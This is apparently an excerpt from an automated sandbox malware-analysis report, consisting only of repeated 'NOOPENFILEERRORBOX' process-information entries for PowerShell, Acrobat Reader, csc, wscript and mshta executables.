Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
